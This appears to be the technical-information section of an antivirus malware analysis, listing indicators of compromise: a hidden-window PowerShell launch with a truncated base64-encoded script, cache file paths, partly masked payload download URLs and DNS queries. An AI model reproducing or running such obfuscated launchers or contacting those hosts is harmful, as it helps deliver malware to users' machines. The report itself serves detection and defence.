Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABYAGcAegBkAGsAZQBrAHEAbgA9ACcARQBoAGQAYwBlAHEAdgB3ACcAOwAkAEkAcQBxAHAAYgB6AHUAZQBnACAAPQAgACcAMQA5AD...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://di####learning.cn/wp-includes/8merf/
- http://ca#####.##gitalcertvalidation.com/TrustAsiaTLSRSACA.crt
- http://www.te######aoutdoorliving.com/lpo7uw/0xua0vw/
- DNS ASK bo##ia.com
- DNS ASK di####learning.cn
- DNS ASK ca#####.##gitalcertvalidation.com
- DNS ASK te######aoutdoorliving.com
- DNS ASK mo####delzein.com
- DNS ASK in#####ial-parks.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABYAGcAegBkAGsAZQBrAHEAbgA9ACcARQBoAGQAYwBlAHEAdgB3ACcAOwAkAEkAcQBxAHAAYgB6AHUAZQBnACAAPQAgACcAMQA5AD...' (with hidden window)